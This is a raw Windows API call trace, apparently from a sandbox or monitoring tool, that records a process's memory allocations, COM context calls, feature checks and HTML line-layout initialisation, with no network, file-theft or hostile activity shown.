[0083.386] ??2@YAPAXI@Z () returned 0x29bc5b0
[0083.386] ??2@YAPAXI@Z () returned 0x29bc5d0
[0083.386] ??2@YAPAXI@Z () returned 0x29bc5f0
[0083.386] ??2@YAPAXI@Z () returned 0x29bc610
[0083.386] ??2@YAPAXI@Z () returned 0x29bc630
[0083.386] ??2@YAPAXI@Z () returned 0x29bc650
[0083.386] ??2@YAPAXI@Z () returned 0x29bc670
[0083.386] ??2@YAPAXI@Z () returned 0x29bc690
[0083.386] ??2@YAPAXI@Z () returned 0x29bc6b0
[0083.386] ??2@YAPAXI@Z () returned 0x29bc6d0
[0083.387] ??2@YAPAXI@Z () returned 0x29bc6f0
[0083.387] ??2@YAPAXI@Z () returned 0x29bc710
[0083.387] ??2@YAPAXI@Z () returned 0x29bc730
[0083.387] ??2@YAPAXI@Z () returned 0x29bc750
[0083.387] ??2@YAPAXI@Z () returned 0x29bc770
[0083.387] ??2@YAPAXI@Z () returned 0x29bc790
[0083.387] ??2@YAPAXI@Z () returned 0x29bc7b0
[0083.387] ??2@YAPAXI@Z () returned 0x29bc7d0
[0083.387] ??2@YAPAXI@Z () returned 0x29bc7f0
[0083.387] ??2@YAPAXI@Z () returned 0x29bc810
[0083.387] ??2@YAPAXI@Z () returned 0x29bc830
[0083.387] ??2@YAPAXI@Z () returned 0x29bc850
[0083.387] ??2@YAPAXI@Z () returned 0x29bc870
[0083.387] ??2@YAPAXI@Z () returned 0x29bc890
[0083.387] ??2@YAPAXI@Z () returned 0x29bd128
[0083.387] ??2@YAPAXI@Z () returned 0x29bc8b0
[0083.387] ??2@YAPAXI@Z () returned 0x29bc8d0
[0083.387] ??2@YAPAXI@Z () returned 0x29bc8f0
[0083.388] ??2@YAPAXI@Z () returned 0x29bc910
[0083.388] ??2@YAPAXI@Z () returned 0x29bc930
[0083.388] ??2@YAPAXI@Z () returned 0x29bc950
[0083.388] ??2@YAPAXI@Z () returned 0x29bc970
[0083.388] ??2@YAPAXI@Z () returned 0x29bc990
[0083.388] ??2@YAPAXI@Z () returned 0x29bc9b0
[0083.388] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ec68 | out: ppv=0x39ec68*=0x1369d0) returned 0x0
[0083.516] MulDiv (nNumber=204, nNumerator=100, nDenominator=1130) returned 18
[0083.516] IUnknown:Release (This=0x1369d0) returned 0x1
[0083.516] GetTickCount () returned 0x1445ea1
[0083.516] ??2@YAPAXI@Z () returned 0x29bc9d0
[0083.516] ??2@YAPAXI@Z () returned 0x29bc9f0
[0083.517] ??2@YAPAXI@Z () returned 0x29bca10
[0083.517] ??2@YAPAXI@Z () returned 0x29bca30
[0083.517] ??2@YAPAXI@Z () returned 0x29bca50
[0083.517] ??2@YAPAXI@Z () returned 0x29bca70
[0083.517] ??2@YAPAXI@Z () returned 0x29bca90
[0083.517] ??2@YAPAXI@Z () returned 0x29bcab0
[0083.517] ??2@YAPAXI@Z () returned 0x29bd790
[0083.517] ??2@YAPAXI@Z () returned 0x29bd7b0
[0083.517] ??2@YAPAXI@Z () returned 0x29bd7d0
[0083.517] ??2@YAPAXI@Z () returned 0x29bd7f0
[0083.517] ??2@YAPAXI@Z () returned 0x29bd810
[0083.517] ??2@YAPAXI@Z () returned 0x29bd830
[0083.517] ??2@YAPAXI@Z () returned 0x29bd850
[0083.518] ??2@YAPAXI@Z () returned 0x29bd870
[0083.518] ??2@YAPAXI@Z () returned 0x29bd890
[0083.518] ??2@YAPAXI@Z () returned 0x29bd8b0
[0083.518] ??2@YAPAXI@Z () returned 0x29bd8d0
[0083.518] ??2@YAPAXI@Z () returned 0x29bd8f0
[0083.518] ??2@YAPAXI@Z () returned 0x29bd910
[0083.518] ??2@YAPAXI@Z () returned 0x29bd930
[0083.518] ??2@YAPAXI@Z () returned 0x29bd950
[0083.518] ??2@YAPAXI@Z () returned 0x29bd970
[0083.518] ??2@YAPAXI@Z () returned 0x29bd990
[0083.518] ??2@YAPAXI@Z () returned 0x29bd9b0
[0083.518] ??2@YAPAXI@Z () returned 0x29bd9d0
[0083.518] ??2@YAPAXI@Z () returned 0x29bd9f0
[0083.519] ??2@YAPAXI@Z () returned 0x29bda10
[0083.519] ??2@YAPAXI@Z () returned 0x29bda30
[0083.519] ??2@YAPAXI@Z () returned 0x29bda50
[0083.519] ??2@YAPAXI@Z () returned 0x29bda70
[0083.519] ??2@YAPAXI@Z () returned 0x29bda90
[0083.519] ??2@YAPAXI@Z () returned 0x29bdab0
[0083.519] ??2@YAPAXI@Z () returned 0x29bdad0
[0083.519] ??2@YAPAXI@Z () returned 0x29bdaf0
[0083.519] ??2@YAPAXI@Z () returned 0x29bdb10
[0083.519] ??2@YAPAXI@Z () returned 0x29bdb30
[0083.519] ??2@YAPAXI@Z () returned 0x29bdb50
[0083.519] ??2@YAPAXI@Z () returned 0x29bdb70
[0083.519] ??2@YAPAXI@Z () returned 0x29bdb90
[0083.520] ??2@YAPAXI@Z () returned 0x29bdbb0
[0083.520] ??2@YAPAXI@Z () returned 0x29bdbd0
[0083.520] ??2@YAPAXI@Z () returned 0x29bdbf0
[0083.520] ??2@YAPAXI@Z () returned 0x29bdc10
[0083.520] ??2@YAPAXI@Z () returned 0x29bdc30
[0083.520] ??2@YAPAXI@Z () returned 0x29bdc50
[0083.520] ??2@YAPAXI@Z () returned 0x29bdc70
[0083.520] ??2@YAPAXI@Z () returned 0x29bdc90
[0083.520] ??2@YAPAXI@Z () returned 0x29bdcb0
[0083.520] ??2@YAPAXI@Z () returned 0x29bdcd0
[0083.520] ??2@YAPAXI@Z () returned 0x29bdcf0
[0083.520] ??2@YAPAXI@Z () returned 0x29bdd10
[0083.520] ??2@YAPAXI@Z () returned 0x29bdd30
[0083.521] ??2@YAPAXI@Z () returned 0x29bdd50
[0083.521] ??2@YAPAXI@Z () returned 0x29bdd70
[0083.521] ??2@YAPAXI@Z () returned 0x29bdd90
[0083.521] ??2@YAPAXI@Z () returned 0x29bddb0
[0083.521] ??2@YAPAXI@Z () returned 0x29bddd0
[0083.521] ??2@YAPAXI@Z () returned 0x29bddf0
[0083.521] ??2@YAPAXI@Z () returned 0x29bde10
[0083.521] ??2@YAPAXI@Z () returned 0x29bde30
[0083.521] ??2@YAPAXI@Z () returned 0x29bde50
[0083.521] ??2@YAPAXI@Z () returned 0x29bde70
[0083.521] ??2@YAPAXI@Z () returned 0x29bde90
[0083.521] ??2@YAPAXI@Z () returned 0x29bdeb0
[0083.521] ??2@YAPAXI@Z () returned 0x29bded0
[0083.522] ??2@YAPAXI@Z () returned 0x29bdef0
[0083.522] ??2@YAPAXI@Z () returned 0x29bdf10
[0083.522] ??2@YAPAXI@Z () returned 0x29bdf30
[0083.522] ??2@YAPAXI@Z () returned 0x29bdf50
[0083.522] ??2@YAPAXI@Z () returned 0x29bdf90
[0083.522] ??2@YAPAXI@Z () returned 0x29bdfb0
[0083.522] ??2@YAPAXI@Z () returned 0x29bdfd0
[0083.523] ??2@YAPAXI@Z () returned 0x29bdff0
[0083.523] ??2@YAPAXI@Z () returned 0x29be010
[0083.523] ??2@YAPAXI@Z () returned 0x29be030
[0083.523] ??2@YAPAXI@Z () returned 0x29be050
[0083.523] ??2@YAPAXI@Z () returned 0x29be070
[0083.523] ??2@YAPAXI@Z () returned 0x29be090
[0083.523] ??2@YAPAXI@Z () returned 0x29be0b0
[0083.523] ??2@YAPAXI@Z () returned 0x29be0d0
[0083.523] ??2@YAPAXI@Z () returned 0x29be778
[0083.523] ??2@YAPAXI@Z () returned 0x29be0f0
[0083.523] ??2@YAPAXI@Z () returned 0x29be110
[0083.523] ??2@YAPAXI@Z () returned 0x29be130
[0083.523] ??2@YAPAXI@Z () returned 0x29be150
[0083.524] ??2@YAPAXI@Z () returned 0x29be170
[0083.524] ??2@YAPAXI@Z () returned 0x29be190
[0083.524] ??2@YAPAXI@Z () returned 0x29be1b0
[0083.524] ??2@YAPAXI@Z () returned 0x29be1d0
[0083.524] ??2@YAPAXI@Z () returned 0x29be1f0
[0083.525] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ec68 | out: ppv=0x39ec68*=0x1369d0) returned 0x0
[0083.526] IUnknown:Release (This=0x1369d0) returned 0x1
[0083.526] GetTickCount () returned 0x1445ea1
[0083.578] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f368 | out: ppv=0x39f368*=0x1369d0) returned 0x0
[0083.579] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.579] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.579] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.579] IsCharSpaceW (wch=0x67) returned 0
[0083.579] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.580] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.580] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.580] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.581] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.581] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.581] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.581] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x17a3f0
[0083.582] ??2@YAPAXI@Z () returned 0x29cb428
[0083.584] ??2@YAPAXI@Z () returned 0x29b4270
[0083.584] ??2@YAPAXI@Z () returned 0x29b3ab0
[0083.585] ??2@YAPAXI@Z () returned 0x29b3ad0
[0083.585] ??2@YAPAXI@Z () returned 0x29b3af0
[0083.585] ??2@YAPAXI@Z () returned 0x29b3b10
[0083.586] GetTickCount () returned 0x1445ee0
[0083.586] GetCurrentThreadId () returned 0xe84
[0083.586] ??2@YAPAXI@Z () returned 0x29b3b30
[0083.586] ??2@YAPAXI@Z () returned 0x29b3b50
[0083.587] ??2@YAPAXI@Z () returned 0x29b3b70
[0083.588] ??2@YAPAXI@Z () returned 0x29b3b90
[0083.588] ??2@YAPAXI@Z () returned 0x29b3bb0
[0083.588] ??2@YAPAXI@Z () returned 0x29b3bd0
[0083.589] ??2@YAPAXI@Z () returned 0x29b3bf0
[0083.589] ??2@YAPAXI@Z () returned 0x29b3c10
[0083.589] ??2@YAPAXI@Z () returned 0x29b3c30
[0083.590] ??2@YAPAXI@Z () returned 0x29b3c50
[0083.590] ??2@YAPAXI@Z () returned 0x29b3c70
[0083.590] ??2@YAPAXI@Z () returned 0x29b3c90
[0083.591] ??2@YAPAXI@Z () returned 0x29b3cb0
[0083.591] ??2@YAPAXI@Z () returned 0x29b3cd0
[0083.591] ??2@YAPAXI@Z () returned 0x29b3cf0
[0083.592] GetTickCount () returned 0x1445ee0
[0083.592] GetCurrentThreadId () returned 0xe84
[0083.593] ??2@YAPAXI@Z () returned 0x29b3d10
[0083.593] ??2@YAPAXI@Z () returned 0x29b3d30
[0083.593] ??2@YAPAXI@Z () returned 0x29b3d50
[0083.609] ??2@YAPAXI@Z () returned 0x29b3d70
[0083.609] ??2@YAPAXI@Z () returned 0x29b3d90
[0083.609] ??2@YAPAXI@Z () returned 0x29b3db0
[0083.610] ??2@YAPAXI@Z () returned 0x29b3dd0
[0083.610] ??2@YAPAXI@Z () returned 0x29b3df0
[0083.610] ??2@YAPAXI@Z () returned 0x29b3e10
[0083.611] ??2@YAPAXI@Z () returned 0x29b3e30
[0083.611] ??2@YAPAXI@Z () returned 0x29b3e50
[0083.611] ??2@YAPAXI@Z () returned 0x29b3e70
[0083.616] ??2@YAPAXI@Z () returned 0x29b3e90
[0083.616] ??2@YAPAXI@Z () returned 0x29b3eb0
[0083.617] ??2@YAPAXI@Z () returned 0x29b3ed0
[0083.617] ??2@YAPAXI@Z () returned 0x29b3ef0
[0083.617] ??2@YAPAXI@Z () returned 0x29b3f10
[0083.617] ??2@YAPAXI@Z () returned 0x29b3f30
[0083.619] ??2@YAPAXI@Z () returned 0x29b3f50
[0083.619] ??2@YAPAXI@Z () returned 0x29b3f70
[0083.619] ??2@YAPAXI@Z () returned 0x29b3f90
[0083.619] ??2@YAPAXI@Z () returned 0x29b3fb0
[0083.620] ??2@YAPAXI@Z () returned 0x29b3fd0
[0083.620] ??2@YAPAXI@Z () returned 0x29b3ff0
[0083.620] ??2@YAPAXI@Z () returned 0x29b4010
[0083.620] ??2@YAPAXI@Z () returned 0x29b4030
[0083.620] ??2@YAPAXI@Z () returned 0x29b4050
[0083.621] ??2@YAPAXI@Z () returned 0x29b4070
[0083.627] ??2@YAPAXI@Z () returned 0x29b4090
[0083.627] ??2@YAPAXI@Z () returned 0x29b40b0
[0083.627] ??2@YAPAXI@Z () returned 0x29b40d0
[0083.627] ??2@YAPAXI@Z () returned 0x29b40f0
[0083.627] ??2@YAPAXI@Z () returned 0x29b4110
[0083.628] ??2@YAPAXI@Z () returned 0x29b4130
[0083.628] ??2@YAPAXI@Z () returned 0x29b4150
[0083.628] ??2@YAPAXI@Z () returned 0x29b4170
[0083.629] ??2@YAPAXI@Z () returned 0x29b4190
[0083.629] ??2@YAPAXI@Z () returned 0x29b41b0
[0083.629] ??2@YAPAXI@Z () returned 0x29b41d0
[0083.629] ??2@YAPAXI@Z () returned 0x29b41f0
[0083.629] ??2@YAPAXI@Z () returned 0x29b4210
[0083.629] ??2@YAPAXI@Z () returned 0x29b4230
[0083.630] ??2@YAPAXI@Z () returned 0x29b4250
[0083.630] ??2@YAPAXI@Z () returned 0x29b4f50
[0083.630] ??2@YAPAXI@Z () returned 0x29b4f70
[0083.630] ??2@YAPAXI@Z () returned 0x29b4f90
[0083.631] ??2@YAPAXI@Z () returned 0x29b4fb0
[0083.631] ??2@YAPAXI@Z () returned 0x29b4fd0
[0083.631] ??2@YAPAXI@Z () returned 0x29b4ff0
[0083.631] ??2@YAPAXI@Z () returned 0x29b5010
[0083.631] ??2@YAPAXI@Z () returned 0x29b5030
[0083.632] ??2@YAPAXI@Z () returned 0x29b5050
[0083.632] ??2@YAPAXI@Z () returned 0x29b5070
[0083.632] ??2@YAPAXI@Z () returned 0x29b5090
[0083.632] ??2@YAPAXI@Z () returned 0x29b50b0
[0083.632] ??2@YAPAXI@Z () returned 0x29b50d0
[0083.632] ??2@YAPAXI@Z () returned 0x29b50f0
[0083.632] ??2@YAPAXI@Z () returned 0x29b5110
[0083.633] ??2@YAPAXI@Z () returned 0x29b5130
[0083.633] ??2@YAPAXI@Z () returned 0x29b5150
[0083.633] ??2@YAPAXI@Z () returned 0x29b5170
[0083.633] ??2@YAPAXI@Z () returned 0x29b5190
[0083.633] ??2@YAPAXI@Z () returned 0x29b51b0
[0083.633] ??2@YAPAXI@Z () returned 0x29b51d0
[0083.633] ??2@YAPAXI@Z () returned 0x29b51f0
[0083.634] ??2@YAPAXI@Z () returned 0x29b5210
[0083.634] ??2@YAPAXI@Z () returned 0x29b5230
[0083.634] ??2@YAPAXI@Z () returned 0x29b5250
[0083.634] ??2@YAPAXI@Z () returned 0x29b5270
[0083.634] ??2@YAPAXI@Z () returned 0x29b5290
[0083.634] ??2@YAPAXI@Z () returned 0x29b52b0
[0083.635] ??2@YAPAXI@Z () returned 0x29b52d0
[0083.635] ??2@YAPAXI@Z () returned 0x29b52f0
[0083.635] ??2@YAPAXI@Z () returned 0x29b5310
[0083.635] ??2@YAPAXI@Z () returned 0x29b5330
[0083.635] ??2@YAPAXI@Z () returned 0x29b5350
[0083.635] ??2@YAPAXI@Z () returned 0x29b5370
[0083.635] ??2@YAPAXI@Z () returned 0x29b5390
[0083.636] ??2@YAPAXI@Z () returned 0x29b53b0
[0083.636] ??2@YAPAXI@Z () returned 0x29b53d0
[0083.636] ??2@YAPAXI@Z () returned 0x29b53f0
[0083.636] ??2@YAPAXI@Z () returned 0x29b5410
[0083.636] ??2@YAPAXI@Z () returned 0x29b5430
[0083.636] ??2@YAPAXI@Z () returned 0x29b5450
[0083.637] ??2@YAPAXI@Z () returned 0x29b5470
[0083.637] ??2@YAPAXI@Z () returned 0x29b5490
[0083.637] ??2@YAPAXI@Z () returned 0x29b54b0
[0083.637] ??2@YAPAXI@Z () returned 0x29b54d0
[0083.637] ??2@YAPAXI@Z () returned 0x29b54f0
[0083.637] ??2@YAPAXI@Z () returned 0x29b5510
[0083.637] ??2@YAPAXI@Z () returned 0x29b5530
[0083.637] ??2@YAPAXI@Z () returned 0x29b5550
[0083.637] ??2@YAPAXI@Z () returned 0x29b5570
[0083.637] ??2@YAPAXI@Z () returned 0x29b5590
[0083.637] ??2@YAPAXI@Z () returned 0x29b55b0
[0083.637] ??2@YAPAXI@Z () returned 0x29b55d0
[0083.638] ??2@YAPAXI@Z () returned 0x29b55f0
[0083.638] ??2@YAPAXI@Z () returned 0x29b5610
[0083.638] ??2@YAPAXI@Z () returned 0x29b5630
[0083.638] ??2@YAPAXI@Z () returned 0x29b5650
[0083.638] ??2@YAPAXI@Z () returned 0x29b5670
[0083.638] ??2@YAPAXI@Z () returned 0x29b5690
[0083.638] ??2@YAPAXI@Z () returned 0x29b56b0
[0083.638] ??2@YAPAXI@Z () returned 0x29b56d0
[0083.638] ??2@YAPAXI@Z () returned 0x29b56f0
[0083.638] ??2@YAPAXI@Z () returned 0x29b5710
[0083.638] ??2@YAPAXI@Z () returned 0x29c0280
[0083.638] ??2@YAPAXI@Z () returned 0x29c02a0
[0083.638] ??2@YAPAXI@Z () returned 0x29c02c0
[0083.639] ??2@YAPAXI@Z () returned 0x29c02e0
[0083.639] ??2@YAPAXI@Z () returned 0x29c0300
[0083.639] ??2@YAPAXI@Z () returned 0x29c0320
[0083.639] ??2@YAPAXI@Z () returned 0x29c0340
[0083.639] ??2@YAPAXI@Z () returned 0x29c0360
[0083.639] ??2@YAPAXI@Z () returned 0x29c0380
[0083.639] ??2@YAPAXI@Z () returned 0x29c03a0
[0083.639] ??2@YAPAXI@Z () returned 0x29c03c0
[0083.639] ??2@YAPAXI@Z () returned 0x29c03e0
[0083.639] ??2@YAPAXI@Z () returned 0x29c0400
[0083.639] ??2@YAPAXI@Z () returned 0x29c0420
[0083.639] ??2@YAPAXI@Z () returned 0x29c0440
[0083.640] ??2@YAPAXI@Z () returned 0x29c0460
[0083.640] ??2@YAPAXI@Z () returned 0x29c0480
[0083.640] ??2@YAPAXI@Z () returned 0x29c04a0
[0083.640] ??2@YAPAXI@Z () returned 0x29c04c0
[0083.640] ??2@YAPAXI@Z () returned 0x29c04e0
[0083.640] ??2@YAPAXI@Z () returned 0x29c0500
[0083.640] ??2@YAPAXI@Z () returned 0x29c0520
[0083.640] ??2@YAPAXI@Z () returned 0x29c0540
[0083.640] ??2@YAPAXI@Z () returned 0x29c0560
[0083.640] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ec68 | out: ppv=0x39ec68*=0x1369d0) returned 0x0
[0083.646] ??3@YAXPAX@Z () returned 0x1
[0083.646] MulDiv (nNumber=211, nNumerator=100, nDenominator=544) returned 39
[0083.646] IUnknown:Release (This=0x1369d0) returned 0x1
[0083.646] GetTickCount () returned 0x1445f1e
[0083.646] ??2@YAPAXI@Z () returned 0x29c0580
[0083.646] ??2@YAPAXI@Z () returned 0x29c05a0
[0083.646] ??2@YAPAXI@Z () returned 0x29c05c0
[0083.646] ??2@YAPAXI@Z () returned 0x29c05e0
[0083.646] ??2@YAPAXI@Z () returned 0x29c0600
[0083.647] ??2@YAPAXI@Z () returned 0x29c0620
[0083.647] ??2@YAPAXI@Z () returned 0x29c0640
[0083.647] ??2@YAPAXI@Z () returned 0x29c0660
[0083.647] ??2@YAPAXI@Z () returned 0x29c0680
[0083.647] ??2@YAPAXI@Z () returned 0x29c06a0
[0083.647] ??2@YAPAXI@Z () returned 0x29c06c0
[0083.647] ??2@YAPAXI@Z () returned 0x29c06e0
[0083.647] ??2@YAPAXI@Z () returned 0x29c0700
[0083.647] ??2@YAPAXI@Z () returned 0x29c0720
[0083.647] ??2@YAPAXI@Z () returned 0x29c0740
[0083.647] ??2@YAPAXI@Z () returned 0x29c0760
[0083.647] ??2@YAPAXI@Z () returned 0x29c0780
[0083.647] ??2@YAPAXI@Z () returned 0x29c07a0
[0083.647] ??2@YAPAXI@Z () returned 0x29c07c0
[0083.648] ??2@YAPAXI@Z () returned 0x29c07e0
[0083.648] ??2@YAPAXI@Z () returned 0x29c0800
[0083.648] ??2@YAPAXI@Z () returned 0x29c0820
[0083.648] ??2@YAPAXI@Z () returned 0x29c0840
[0083.648] ??2@YAPAXI@Z () returned 0x29c0860
[0083.648] ??2@YAPAXI@Z () returned 0x29c0880
[0083.648] ??2@YAPAXI@Z () returned 0x29c08a0
[0083.648] ??2@YAPAXI@Z () returned 0x29c08c0
[0083.648] ??2@YAPAXI@Z () returned 0x29c08e0
[0083.648] ??2@YAPAXI@Z () returned 0x29c0900
[0083.648] ??2@YAPAXI@Z () returned 0x29c0920
[0083.648] ??2@YAPAXI@Z () returned 0x29c0940
[0083.648] ??2@YAPAXI@Z () returned 0x29c0960
[0083.649] ??2@YAPAXI@Z () returned 0x29c0980
[0083.649] ??2@YAPAXI@Z () returned 0x29c09a0
[0083.649] ??2@YAPAXI@Z () returned 0x29c09c0
[0083.649] ??2@YAPAXI@Z () returned 0x29c09e0
[0083.649] ??2@YAPAXI@Z () returned 0x29c0a00
[0083.649] ??2@YAPAXI@Z () returned 0x29c0a20
[0083.649] ??2@YAPAXI@Z () returned 0x29c0a40
[0083.649] ??2@YAPAXI@Z () returned 0x29ca720
[0083.649] ??2@YAPAXI@Z () returned 0x29ca740
[0083.649] ??3@YAXPAX@Z () returned 0xa0001
[0083.649] ??2@YAPAXI@Z () returned 0x29b1788
[0083.649] ??2@YAPAXI@Z () returned 0x29caf08
[0083.650] realloc (_Block=0x0, _Size=0xa0) returned 0x29cb428
[0083.650] realloc (_Block=0x29b1838, _Size=0x20) returned 0x29cb4d0
[0083.650] realloc (_Block=0x29cb428, _Size=0x140) returned 0x29b6798
[0083.650] realloc (_Block=0x29cb4d0, _Size=0x40) returned 0x29cb4d0
[0083.650] realloc (_Block=0x29b6798, _Size=0x280) returned 0x29bc6e8
[0083.650] realloc (_Block=0x29cb4d0, _Size=0x80) returned 0x29cb428
[0083.650] realloc (_Block=0x29bc6e8, _Size=0x500) returned 0x29ba638
[0083.650] realloc (_Block=0x29cb428, _Size=0x100) returned 0x29cb428
[0083.650] realloc (_Block=0x29ba638, _Size=0xa00) returned 0x29cb5a0
[0083.650] ??2@YAPAXI@Z () returned 0x29b1838
[0083.650] realloc (_Block=0x0, _Size=0xc8) returned 0x29b6798
[0083.650] realloc (_Block=0x29b6798, _Size=0x194) returned 0x29b6798
[0083.651] ??3@YAXPAX@Z () returned 0x1
[0083.651] GetCurrentThreadId () returned 0xe84
[0083.651] GetCurrentThreadId () returned 0xe84
[0083.651] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0083.651] ??3@YAXPAX@Z () returned 0x1
[0083.651] free (_Block=0x29b11d0)
[0083.651] GetCurrentThreadId () returned 0xe84
[0083.651] GetCurrentThreadId () returned 0xe84
[0083.651] GetCurrentThreadId () returned 0xe84
[0083.652] GetCurrentThreadId () returned 0xe84
[0083.652] GetCurrentThreadId () returned 0xe84
[0083.652] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152ab8 | out: hHeap=0x110000) returned 1
[0083.652] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x175c28 | out: hHeap=0x110000) returned 1
[0083.653] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e448 | out: hHeap=0x110000) returned 1
[0083.653] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.659] GetCurrentThreadId () returned 0xe84
[0083.659] SetEvent (hEvent=0x1b8) returned 1
[0083.667] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc) returned 0x17ea48
[0083.667] RegisterDragDrop (hwnd=0x1034a, pDropTarget=0x73da96cc) returned 0x0
[0083.669] GetCurrentThreadId () returned 0xe84
[0083.669] GetCurrentThreadId () returned 0xe84
[0083.669] GetCurrentThreadId () returned 0xe84
[0083.669] GetCurrentThreadId () returned 0xe84
[0083.671] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xdc) returned 0x176d48
[0083.671] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166e98
[0083.672] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x250) returned 0x17b6a8
[0083.672] LsGetRubyLsimethods () returned 0x0
[0083.672] LsGetTatenakayokoLsimethods () returned 0x0
[0083.672] LsGetHihLsimethods () returned 0x0
[0083.672] LsGetWarichuLsimethods () returned 0x0
[0083.672] LsGetReverseLsimethods () returned 0x0
[0083.672] LsCreateContext () returned 0x0
[0083.672] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x670) returned 0x17be90
[0083.672] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x24) returned 0x152ab8
[0083.672] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x110) returned 0x17c508
[0083.672] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x24) returned 0x152ae8
[0083.672] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x2e4) returned 0x161030
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x16dc00
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x16dc28
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa0) returned 0x17db18
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174480
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x16dc50
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x164940
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x164968
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x17f3e8
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x400) returned 0x161320
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8) returned 0x1696a0
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8) returned 0x1696b0
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8) returned 0x1696c0
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8) returned 0x1696d0
[0083.673] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x128) returned 0x17b900
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x11c) returned 0x17ba30
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x108) returned 0x161728
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x130) returned 0x161838
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x110) returned 0x161970
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x278) returned 0x161a88
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc8) returned 0x161d08
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x190) returned 0x161dd8
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x78) returned 0x1220d0
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xf0) returned 0x161f70
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4c) returned 0x14e448
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x194) returned 0x162068
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc8) returned 0x162208
[0083.674] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x190) returned 0x187688
[0083.675] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x108) returned 0x187820
[0083.675] LsSetModWidthPairs () returned 0x0
[0083.675] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x240) returned 0x187930
[0083.675] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x18) returned 0x17a3f0
[0083.675] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x17f410
